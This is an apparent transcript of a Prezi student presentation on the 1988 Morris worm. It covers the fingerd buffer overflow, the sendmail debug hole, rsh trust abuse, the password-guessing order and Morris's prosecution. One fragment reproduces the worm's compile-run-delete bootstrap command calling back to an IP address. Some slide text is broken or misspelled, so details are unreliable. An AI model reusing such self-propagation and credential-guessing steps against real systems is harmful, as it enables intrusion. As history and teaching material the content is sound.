Send the link below via email or IMCopy
Present to your audienceStart remote presentation
- Invited audience members will follow you as you navigate and present
- People invited to a presentation do not need a Prezi account
- This link expires 10 minutes after you close the presentation
- A maximum of 30 users can follow your presentation
- Learn more about this feature in our knowledge base article
Do you really want to delete this prezi?
Neither you, nor the coeditors you shared it with will be able to recover it again.
Make your likes visible on Facebook?
You can change this under Settings & Account at any time.
Transcript of MORRIS WORM
Took advantage of vulnerabilities of Unix:
PROPAGATION VIA FINGER DAEMON VULNERABILITY:
• UNIX daemon which allows users to obtain information about other user over TCP/IP
Buffer overflow vulnerability (gets()):
buffer size -
, username request -
Evening of 1988 a graduate student in Cornell University Robert T Morris jr. released first computer worm
WHAT IS WORM?
uses a network
to send copies of itself to other nodes
without any user
in widely used services
Internet was used mostly by academics to share information: among
connected to Internet
were effected by worm
Beyond the damage of caused by repeatedly infection by worm it
didn't damage anything
Morris jr. was
judged due to computer
Fraud & Abuse act (1986)
he was sentenced to three years of probation
400 hours of community service
fine of $10,050 plus the costs of his supervision
Used password guessing and dictionary attack mechanism
Password guessing mechanism of the Morris worm was following:
1) NULL password
2) Username as the password
3) User name followed by itself : jsmithjsmith
4) Backward user name : htimsj
5) GECOS data from pw file
6) Special dictionary containing known pw contained 432 words
7) Exstream attack:
~ 4 weeks
Mailer program to route mail in a heterogeneous network.
• By debug option, tester can run programs to display the state of the mail system without sending mail or establishing a separate login connection
• This resulted in the worm connected to a remote shell via the TCP connection.
are network services which offer remote command interpreters.
/etc/hosts.equir; .rhosts(per user)
• Client IP, user ID
• Rely on a “privileged” originating port and permission files
• User ID, Password
• uses password authentication
1) passwordless rsh
4)rexec and password rsh
finger zulfiqar e example
- buffer size
cc –o x14481910 x14481910.c;
./x1448190 188.8.131.52 32341 8712440
rm –f x14481910 x14481910.c;
1 of 7 times self destruction
uses password attack
rsh =remote shell
as full search ~ 4 weeks
• Collects information on other machines in the network
• Reading public configuration files
• Running system utility program
• This vector program was 99 lines of C code that would be compiled and run on the remote machine.
• Connects back to the infecting machine, transfers the main worm binary
• Deleted automatically
What is worm?
Who, when and why created worm ?
Worm work steps
High level description
Cyber attacks effect real life (broker stokes ):
"Hacked AP Twitter feed reporting fake White House attack rocks markets" (2013)
torrents, Deep Web ...